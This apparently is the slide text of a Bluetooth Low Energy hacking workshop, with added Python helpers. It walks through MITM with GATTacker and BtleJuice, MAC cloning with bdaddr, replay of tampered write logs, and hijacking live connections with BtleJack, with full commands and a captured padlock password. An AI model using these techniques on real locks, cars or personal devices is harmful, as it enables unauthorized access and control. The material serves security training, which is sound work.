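    for flags, _ts, pkt in records:
        if flags & 0x02 or len(pkt) < 10 or pkt[0] != H4_ACL:
            continue                                # flag bit1 set = HCI command/event, not data
        hdl_flags, _acl_len = struct.unpack("<HH", pkt[1:5])
        if (hdl_flags >> 12) & 0x3 == 0x1:
            continue                                # continuation fragment; only first fragments handled here
        l2cap_len, cid = struct.unpack("<HH", pkt[5:9])
        if cid != L2CAP_CID_ATT:
            continue
        att = pkt[9:9 + l2cap_len]
        opcode = att[0]
        handle = struct.unpack("<H", att[1:3])[0] if opcode in ATT_WITH_HANDLE else None
        value = bytes(att[3:]) if handle is not None else bytes(att[1:])
        direction = "phone->device" if flags & 0x01 == 0 else "device->phone"   # flag bit0: 0 sent, 1 received
        out.append((direction, opcode, handle, value))
    return out


def write_requests(records):
    """Same selection as btatt.opcode == 0x12 in Wireshark: [(handle, value)]."""
    return [(h, v) for _d, op, h, v in att_pdus(records) if op == 0x12]


# --- constructed sample log, built with the same framing the parser expects ---
def _h4_acl_att(att: bytes, conn_handle: int = 0x0040) -> bytes:
    l2cap = struct.pack("<HH", len(att), L2CAP_CID_ATT) + att
    return bytes([H4_ACL]) + struct.pack("<HH", conn_handle | (0x2 << 12), len(l2cap)) + l2cap


def _record(pkt: bytes, received: bool, ts_us: int) -> bytes:
    return struct.pack(">IIIIq", len(pkt), len(pkt), 1 if received else 0, 0, ts_us) + pkt


SAMPLE_BTSNOOP = (
    BTSNOOP_MAGIC + struct.pack(">II", 1, DATALINK_H4)
    + _record(_h4_acl_att(b"\x12" + struct.pack("<H", 0x0025) + b"\x01"), False, 1)      # LED on
    + _record(_h4_acl_att(b"\x13"), True, 2)                                               # Write Response
    + _record(_h4_acl_att(b"\x12" + struct.pack("<H", 0x0029) + b"12345678"), False, 3)   # "password"
    + _record(_h4_acl_att(b"\x1b" + struct.pack("<H", 0x0027) + b"\x00"), True, 4)        # notification
)

if __name__ == "__main__":
    for direction, op, handle, value in att_pdus(parse_btsnoop(SAMPLE_BTSNOOP)):
        print(f"{direction:14} {ATT_NAMES.get(op, hex(op)):26} handle={handle} value={value.hex()} ({value!r})")
```

The timestamp field is left raw (microseconds since the btsnoop epoch, not the Unix one); ACL continuation fragments are skipped, so long writes that exceed the ATT MTU would need reassembly before decoding.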
How do we hack BLE?

Passive sniffing:
- Using simple hardware is unreliable, easy to lose packets.
- Difficult to understand the transmission in Wireshark.
- Limited scripting – decode pcap, replay packets.
- Can be helpful to diagnose what is happening on the link layer (e.g. Bluetooth encryption).
- Does not require access to the device nor the smartphone.
- Limited possibilities to decode encrypted connections (intercept pairing + CrackLE).

Android HCI dump:
- Catches all the packets (of our transmission).
- Difficult to understand the transmission in Wireshark.
- Limited scripting – decode pcap, replay packets.
- Does not cover the link layer. Only data exchanged between Android and the BT adapter.
- Requires access to the smartphone.
- Even if the connection is encrypted, we have the packets in cleartext (de-/encrypted by the adapter).
INTERCEPTING
MOBILE APP
Frida – hooking mobile app

[diagram: Frida hooks inside the mobile app on the central; HCI dump and passive sniffing as before]
Frida hooks in mobile application

Replace writing to a characteristic with your own function

[Link]
Frida - results

[Link]
Possible advantage

This way it may be possible to hook into cleartext values before encryption/obfuscation.
BLE MITM
The car hacking contest again
Sometimes...

We can sniff the link communication, but it is encrypted on the GATT layer
(we see only an encrypted hex stream).
How about active interception?

Man in the Middle:
We will force the mobile app to connect to us, and forward the requests to the car and back!
How do we hack BLE?

[diagram: active MITM between central and peripheral, next to HCI dump and passive sniffing]
How do we MITM RF?

Mallory between Alice and Bob
Isolate the signal?
Physics...

Diffraction: bending of a wave around the edges of an opening or an obstacle

[Link]

[Link]
Stronger signal? More signals?

Class 1 adapter? +8dBm, 100m range

"little difference in range whether the other end of the link is a Class 1 or Class 2 device as the lower powered device tends to set the range limit"
And how to handle them in a single system?
[Link]
Typical connection flow
1. Mobile: start scanning for advertisements
2. Device: advertise
3. Mobile: specific advertisement received, stop scanning
4. Mobile: connect to the advertising device (MAC)
5. Further communication
Attack?
1. Mobile: start scanning for advertisements
2. MITM: advertise more frequently than the original device
3. Mobile: specific advertisement received, stop scanning
4. Mobile: connect to the advertising device (MAC), i.e. to us
5. Further communication goes through us
MITM: keep the connection to the original device. It does not advertise while connected ;)
MITM – what actually works

Advertise more frequently
• The victim's mobile will interpret the first advertisement it receives
• Devices are usually optimized for longer battery life, so they advertise less frequently
Clone the MAC address of the targeted device
• Not always necessary, but mostly helpful
Keep connected to the target device
• Devices do not advertise while connected
• Only one connection at a time accepted
• Usually easy, most connections are short-term
• For constantly-connected: targeted jamming/social engineering/patience...
GATTacker – MITM

Open source
[Link]
Websockets
Modular design
Json
.io website

And a cool logo!
GATTacker - architecture

[diagram: „device cloning”: the ws-slave gets the advertisement and services from the target; the emulated device advertises the „cloned” device; the „proxy” forwards the traffic, with interception and tampering in between]
We will team up for 2 separate boxes

Box 1 – emulated device: advertises the „cloned” device, the mobile app connects to it.
Box 2 – „proxy” (ws-slave): connects to the target; interception and tampering happen between the two.
Separate boxes

It is possible to run both components on one box (configure BLENO/NOBLE_HCI_DEVICE_ID in [Link]).
But it is not very reliable at this moment (kernel-level device mismatches).
Much more stable results on separate ones.
Box 2 – switch VM to „bridge mode”, check IP
Box 2 - run ws-slave (client)

root@kali:~# cd node_modules/gattacker

root@kali:~/node_modules/gattacker# node [Link]

GATTacker ws-slave
Box 1 (emulating device) – edit config file

root@kali:~# cd node_modules/gattacker/

root@kali:~/node_modules/gattacker# gedit [Link]

Edit BLENO_HCI_DEVICE_ID to your HCI, and the WS_SLAVE address to match your Raspberry / Box 2:
# "peripheral" device emulator
BLENO_HCI_DEVICE_ID=0
# ws-slave websocket address
WS_SLAVE=[Link] -> IP of your colleague's box
1. Scan device to JSON

[diagram: Box 2 (ws-slave) receives the advertisement and services over BLE; Box 1 ([Link]) gets them over WiFi and writes the advertisement + services JSON]
Scan for advertisements (Kali)

root@kali:~/node_modules/gattacker# node [Link]

Ws-slave address: <your_slave_ip>

on open

poweredOn

Start scanning.
GATTacker: scan for devices

Device MAC
Scan device characteristics Target device
MAC

root@kali:~/node_modules/gattacker# node scan f4b85ec06ea5


Ws-slave address: <your_slave_ip>
on open
poweredOn
Start exploring f4b85ec06ea5
Start to explore f4b85ec06ea5
explore state: f4b85ec06ea5 : start
explore state: f4b85ec06ea5 : finished
Services file devices/[Link] saved!
2. Advertise

[diagram: [Link] on Box 1 advertises from the advertisement + services JSON]
Free the BT interface

In case you have the ws-slave running on the same machine, stop it (we will need the BT interface):
(...) ws -> close

^Croot@kali:~/node_modules/gattacker#

Also stop the bluetooth service, it may interfere:

root@kali:~# systemctl stop bluetooth

Check that your bluetooth adapter is up

# hciconfig
hci0: Type: Primary Bus: USB
BD Address: [Link] ACL MTU: 310:10 SCO MTU: 64:8
DOWN RUNNING
RX bytes:574 acl:0 sco:0 events:30 errors:0
TX bytes:368 acl:0 sco:0 commands:30 errors:0
# hciconfig hci0 up
# hciconfig
hci0: Type: Primary Bus: USB
BD Address: [Link] ACL MTU: 310:10 SCO MTU: 64:8
UP RUNNING
RX bytes:1148 acl:0 sco:0 events:60 errors:0
TX bytes:736 acl:0 sco:0 commands:60 errors:0
advertise

root@kali:~/node_modules/gattacker# node [Link] -h


Usage: node advertise -a <FILE> [ -s <FILE> ] [-S]
-a, --advertisement=FILE advertisement json file
-s, --services=FILE services json file
-S, --static static - do not connect to ws-slave/target
device
-f, --funmode have fun!
--jk see [Link]
-h, --help display this help
Start to advertise your device

root@kali:~/node_modules/gattacker# node [Link] -a devices/d0c92e6350b3_smartlockpicking01.[Link]

-a: your device advertisement (not services) json file. The script assumes the services file (-s) is <mac>.[Link]
Properly initialized

Connection to target device established
Troubleshooting

The script stops here, cannot connect to the target device

If you are already connected to your device, disconnect.
Try to restart your device.
Troubleshooting v2

Connection to target device successful, but the BLE interface for emulation is down

Is your Bluetooth adapter interface up?
# hciconfig hci0 up
Connect to your emulated device

Notice the MAC address is your BLE adapter’s MAC, not the original device's.
The advertising interval is also an order of magnitude shorter.
Now try to send something to the device from nRF Connect

Intercepted read and write requests
REPLAY
Data dump of the intercepted communication

dump/<MAC>.log
Dump data format

Logs are saved in text format:

timestamp | type | service UUID (optional name) | characteristic UUID (optional name) | hex data (ascii data)

example:

2017.03.24 [Link].930 | > R | 180f (Battery Service) | 2a19 (Battery Level) | 50 (P)
Transmission type

> R - received read
> N - received notification
< W - sent write request (without response)
< C - sent write command (with response)
(In the ATT specification the names go the other way round: a Write Request gets a Write Response, a Write Command does not. For the replay only the letter matters.)
Replay

You can edit the dump file, e.g. change the value „01” to „00”
2018.03.22 [Link].321 | < C | a000 | a001 | 00 ( )
Replay script

root@kali:~/node_modules/gattacker# node [Link] -i dump/[Link] -p d0c92e6350b3 -s devices/[Link]

-i: dump file; -p: target device MAC; -s: target device services, previously scanned
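The dump format and the hand edit from the two slides above, as code: parse dump/<MAC>.log, keep the "<" lines (the ones the replay sends), change a value on a chosen characteristic and write the file back in the same format. This is an added example, not GATTacker code; its regular expression is built from the format line documented above, SAMPLE_DUMP is constructed (the timestamps are invented, the UUIDs and values follow the slide's a000/a001 example), and the convention of printing non-printable bytes as spaces in the ASCII column is taken from the "00 ( )" line.

```python
"""Added example: parse, tamper with and re-serialize a GATTacker dump log."""
import re
from dataclasses import dataclass, replace
from typing import List, Optional

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \| (?P<dir>[<>]) (?P<kind>[RNWC]) \| "
    r"(?P<svc>[0-9a-fA-F]+)(?: \((?P<svc_name>[^)]*)\))? \| "
    r"(?P<chr>[0-9a-fA-F]+)(?: \((?P<chr_name>[^)]*)\))? \| "
    r"(?P<hex>[0-9a-fA-F]*) \((?P<ascii>.*)\)$"
)


@dataclass(frozen=True)
class DumpEntry:
    ts: str
    direction: str              # "<" sent by the central (our side), ">" received from the peripheral
    kind: str                   # R read, N notification, W write request, C write command
    service: str
    service_name: Optional[str]
    characteristic: str
    characteristic_name: Optional[str]
    value: bytes

    def to_line(self) -> str:
        svc = self.service + (f" ({self.service_name})" if self.service_name else "")
        chr_ = self.characteristic + (f" ({self.characteristic_name})" if self.characteristic_name else "")
        ascii_ = "".join(chr(b) if 32 <= b < 127 else " " for b in self.value)  # non-printables as spaces
        return f"{self.ts} | {self.direction} {self.kind} | {svc} | {chr_} | {self.value.hex()} ({ascii_})"


def parse_dump(text: str) -> List[DumpEntry]:
    entries = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"line {n} does not match the dump format: {line!r}")
        entries.append(DumpEntry(m["ts"], m["dir"], m["kind"], m["svc"].lower(), m["svc_name"],
                                 m["chr"].lower(), m["chr_name"], bytes.fromhex(m["hex"])))
    return entries


def writes_for_replay(entries: List[DumpEntry]) -> List[DumpEntry]:
    """The replay re-sends what the central wrote; reads and notifications are only context."""
    return [e for e in entries if e.direction == "<"]


def tamper(entries: List[DumpEntry], characteristic: str, old: bytes, new: bytes) -> List[DumpEntry]:
    """The slide's manual edit: every write of `old` to `characteristic` becomes `new`."""
    return [replace(e, value=new)
            if e.direction == "<" and e.characteristic == characteristic.lower() and e.value == old
            else e for e in entries]


def to_dump(entries: List[DumpEntry]) -> str:
    return "\n".join(e.to_line() for e in entries) + "\n"


# Constructed sample in the documented format (timestamps invented).
SAMPLE_DUMP = """\
2018.03.22 10:15:01.930 | > R | 180f (Battery Service) | 2a19 (Battery Level) | 50 (P)
2018.03.22 10:15:03.321 | < C | a000 | a001 | 01 ( )
2018.03.22 10:15:04.102 | > N | a000 | a002 | 01 ( )
"""

if __name__ == "__main__":
    entries = parse_dump(SAMPLE_DUMP)
    print(to_dump(tamper(writes_for_replay(entries), "a001", b"\x01", b"\x00")), end="")
```

Only the hex column is authoritative when editing: the ASCII column is regenerated from it, so a value changed only in the parentheses would replay the old bytes.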
Replay using nRF Connect mobile app

[Link]

nRF Connect:

[Link]
Macros functionality

nRF Connect: macros documentation:
[Link]
Connect/tree/master/documentation/Macros
GATTacker howto export:
[Link]
replay
Convert GATTacker log to nRF XML macro

# node gattacker2nrf -i dump/[Link] > [Link]


MAC SPOOFING
Bluetooth MAC address spoofing

Some mobile applications rely only on the advertisement packets and don’t care about the MAC address.
But most of them (including this one) do.
It is easy to change the Bluetooth adapter MAC using the bdaddr tool (part of BlueZ).

For some chipsets it may be troublesome.
Bdaddr (already in your VM/Raspberry)

root@kali:~/node_modules/gattacker/helpers/bdaddr# make
gcc -c bdaddr.c
gcc -c oui.c
gcc -o bdaddr bdaddr.o oui.o -lbluetooth

# cp bdaddr /usr/local/sbin
Change MAC
root@kali:~# bdaddr
Can't read version info for hci0: Network is down (100)
root@kali:~# hciconfig hci0 up
root@kali:~# bdaddr
Manufacturer: Cambridge Silicon Radio (10)
Device address: [Link] Your target MAC
root@kali:~# bdaddr -i hci0 [Link]
Manufacturer: Cambridge Silicon Radio (10)
Device address: [Link]
New BD address: [Link] Now re-plug the interface
to reset it
Address changed - Reset device now
root@kali:~# hciconfig hci0 up
root@kali:~# bdaddr
Manufacturer: Cambridge Silicon Radio (10) Check the MAC address is
Device address: [Link] changed
Simple helper script to change MAC automatically
For the helper script (changing MAC automatically), uncomment in [Link]:

# "peripheral" device emulator
BLENO_HCI_DEVICE_ID=0

(ID of your advertising adapter, 0 for hci0)
Start device – mac_adv (wrapper to [Link])

root@kali:~node_modules/gattacker# ./mac_adv -a devices/f4b85ec06ea5_Padlock-.[Link] -s devices/[Link]
Advertise with cloned MAC address
Manufacturer: Cambridge Silicon Radio (10)
Device address: [Link]
New BD address: [Link]
Address changed - Reset device now
Re-plug the interface and hit enter
(the helper bash script changes the MAC address; re-plug the USB adapter at this point)
Cleartext password:
12345678
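The padlock password captured above is a static secret, so the Replay slide's edit-and-resend works against it. As an added defender-side model (not Hackmelock, not the padlock or any product on these slides; the key and tag length are assumptions), this is how a peripheral can bind each unlock write to a fresh per-connection challenge, so that bytes taken from a dump are rejected when re-sent in a later connection:

```python
import hashlib
import hmac
import os

# Constructed model, not Hackmelock or the padlock from the slides: a placeholder
# key provisioned at pairing time; the tag length is an assumption.
SHARED_KEY = bytes.fromhex("000102030405060708090a0b0c0d0e0f")
TAG_LEN = 8


class ChallengeLock:
    """Peripheral whose unlock write must authenticate a fresh per-connection challenge."""

    def __init__(self, key):
        self._key = key
        self._challenge = None
        self.unlocked = False

    def on_connect(self):
        """New random challenge each connection, exposed as a readable characteristic."""
        self._challenge = os.urandom(8)
        return self._challenge

    @staticmethod
    def unlock_payload(key, challenge):
        """What a legitimate client writes: opcode 0x01 + truncated HMAC over the challenge."""
        tag = hmac.new(key, b"unlock" + challenge, hashlib.sha256).digest()[:TAG_LEN]
        return b"\x01" + tag

    def on_write(self, payload):
        """Handle a write to the unlock characteristic; the challenge is single use."""
        if self._challenge is None:
            return "rejected: no live challenge"
        challenge, self._challenge = self._challenge, None
        if len(payload) != 1 + TAG_LEN or payload[0] != 0x01:
            return "rejected: malformed"
        if not hmac.compare_digest(self.unlock_payload(self._key, challenge), payload):
            return "rejected: bad tag"
        self.unlocked = True
        return "unlocked"


def replay_demo(key=SHARED_KEY):
    """Legitimate unlock, then the same bytes re-sent in a new connection as a replay would."""
    lock = ChallengeLock(key)
    captured = ChallengeLock.unlock_payload(key, lock.on_connect())  # what a dump would hold
    first = lock.on_write(captured)
    lock.unlocked = False
    lock.on_connect()                      # next connection gets a different challenge
    second = lock.on_write(captured)       # replayed bytes no longer match
    return first, second
```

This only addresses replay of application-layer writes; a MITM that holds the key, or link-layer hijacking as with BtleJack later on, is a separate problem.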
BTLEJUICE
Introducing BtleJuice by Damien Cauquil @virtualabs

[Link]
[Link]

[Link]

The concept of multiple discovery (also known as simultaneous invention) is the


hypothesis that most scientific discoveries and inventions are made independently and
more or less simultaneously by multiple scientists and inventors.
Install in Kali (already in your VM)

# apt-get install nodejs npm


# npm install --unsafe-perm -g btlejuice
BtleJuice – run „proxy” on Box 1

root@kali:~# hciconfig hci0 up
root@kali:~# btlejuice-proxy
[i] Using interface hci0
[info] Server listening on port 8000

BtleJuice interface – box 2

root@kali:~# btlejuice -u <your_proxy_ip> -w

[Link]

Start scanning for devices
Properly set-up
Now connect to the emulated device and try to write
Btlejuice - replay

Right-click on any row and select „Replay”
You can change the value here

Btlejuice - hook

Right-click on a row and select „Set hook”
Now try to read or write to the given characteristic – popup:
You can change the value here
BtleJuice vs GATTacker

- Depends on stock noble/bleno – several pros vs cons
- Automatic MAC address spoofing currently unstable
- Has much better UI (web vs console), simple replay/tamper
- Just try the other tool if something does not work for you
How do we hack BLE?
Passive sniffing
- Using simple hw is unreliable, easy to lose packets.
- Difficult to understand transmission in Wireshark.
- Limited scripting – decode pcap, replay packets.
- Can be helpful to diagnose what is happening on link-layer (e.g. Bluetooth encryption).
- Does not require access to device nor smartphone.
- Limited possibilities to decode encrypted connections (intercept pairing + CrackLE).

Android HCI dump
- Catches all the packets (of our transmission).
- Difficult to understand transmission in Wireshark.
- Limited scripting – decode pcap, replay packets.
- Does not cover link-layer. Only data exchanged between Android and BT adapter.
- Requires access to smartphone.
- Even if the connection is encrypted, we have the packets in cleartext (de-/encrypted by adapter).

Active MITM
- Catches all the packets (+ allows for active modification).
- Easy to understand transmission (GATTacker console, BtleJuice web).
- Hooks, possible to proxy, API for live packets tampering...
- Does not cover link-layer. Not that we actually need it ;)
- Does not require access to device nor smartphone.
- Will not work (out of box) against link-layer Bluetooth encryption.
THE SEX TOY AGAIN
BTW the sex toy intercepted in GATTacker

# node scan 38d269e523b1
# ./mac_adv -a devices/38d269e523b1_REALOV-[Link]

BTW, the sex toy intercepted in GATTacker
Characteristics, write
Vendor response

[Link]

Would you call it „hack”?


Or does it?
[Link]
Proximity = limited risk, valid point

[Link]
[Link]
BtleJack, Defcon 26

[Link]
[Link]
Hijacking Lovense sex toy

[Link]
Cauquil-Secure-Your-BLE-Devices-Demo-Videos/demo-hush.mp4
BTLEJACK
BtleJack

Presented at Defcon 26 by Damien Cauquil (@virtualabs)

Slides:
[Link]
mien%20Cauquil%20-%20Updated/DEFCON-26-Damien-Cauquil-Secure-Your-BLE-
[Link]

Source:
[Link]
BtleJack

Designed to work on the BBC micro:bit.
It is a $15 educational device, easy to develop for (MicroPython) and to flash (copy a file to its USB storage).
Built upon the nRF51822 -> we can use the BtleJack firmware on other nRF51822 hardware.
[Link]
BtleJack on other nRF51822

BLE400 already has a built-in USB adapter.
The pinout is different from the BBC micro:bit -> a small patch to the firmware:

[Link](P0_9, P0_11);
Flash Btlejack to our board using openocd

> halt
> nrf51 mass_erase
> reset
> halt
> flash write_image nrf/[Link]
(...)
> reset
For the new Btlejack version

Btlejack requires the client and firmware versions to match.
After updating the client, the firmware should also be updated.
Current BLE400 hex precompiled by Damien on GitHub:
[Link]
firmware/blob/master/dist/[Link]
Install BtleJack client (already in your VM)

Kali Linux:
# pip3 install btlejack
Btlejack – catch and follow connection requests

root@kali:~# btlejack -c any -d /dev/ttyUSB0
BtleJack version 1.1
[i] Detected sniffers:
> Sniffer #0: version 1.2

Works basically like an nRF sniffer
Btlejack – catch any connreq (adv channels)
Filter specific device MAC

root@kali:~# btlejack -c [Link] -d /dev/ttyUSB0
BtleJack version 1.2
[i] Detected sniffers:
> Sniffer #0: version 1.2

Save output to pcap (Wireshark)

root@kali:~# btlejack -c any -d /dev/ttyUSB0 -x nordic -o [Link]

pcap format (nordic, ll_phdr, pcap)


Multiple Btlejack devices

root@kali:~# btlejack -c [Link] -d /dev/ttyUSB0 -d /dev/ttyUSB1 -d /dev/ttyUSB2

Devices will work in parallel, better chances to catch packets
Catch existing connections

root@kali:~# btlejack -s -d /dev/ttyUSB0
BtleJack version 1.1
[i] Enumerating existing connections ...
[ - 55 dBm] 0x1816aa34 | pkts: 1
[ - 55 dBm] 0x1816aa34 | pkts: 2
[ - 55 dBm] 0x1816aa34 | pkts: 3

After a connection is established, it is identified on the radio by its „access address” (connection id).
Follow specific connection

btlejack -f <access address>

Example data captured (LED on)
Read value of 0x27
Value 00
Write 01 to 0x27
Read again value of 0x27
Value 01
Hijack the connection

root@kali:~# btlejack -f 0x9edbd4ca -t -d /dev/ttyUSB0
(...)
[i] Synchronized, hijacking in progress ...
[i] Connection successfully hijacked, it is all yours \o/
btlejack> write <value handle> <data format> <data>
write 0x25 hex 01

Turn on the LED

SEE ALSO
Hackmelock
Open-source

[Link]

Sources:
[Link]

[Link]
Requirements – emulator script

Hackmelock is written using the [Link] bleno library (and additional libs: colors, async). It is already installed on your Raspberry.

Installing on other systems: npm install hackmelock.

It was tested on Linux (Kali, Raspberry Pi, ...); it should also run on Mac and probably on Windows.

Bleno installation and requirements:
[Link]
Install (already in your Kali)

Emulated device:
$ npm install hackmelock

Android app:
[Link]
Run emulator

$ cd node_modules/hackmelock/
$ node peripheral

advertising...
In configuration mode, it advertises iBeacon Major/Minor=1
Pairing
After pairing emulator stores [Link]

$ node [Link]
advertising...
Client [Link] connected!
Status read request:
Initialization mode!
initializing... 0 531ce397
initializing... 1 325d18fe1481151073dc4d4a
initializing... 2 7ca71db0196bda712131dc57
(...)
Config loaded - iBeaconMajor: 21276 iBeaconMinor: 58263
Sharing access
See also

Hacking bluetooth smart locks (my Brucon workshop slides):
[Link]
Smart_locks.pdf
BLE CTF (esp32)
[Link]
[Link]
BLEMystique (esp32)
[Link]
Want to learn more?

Trainings
Tutorials
Events
...

[Link]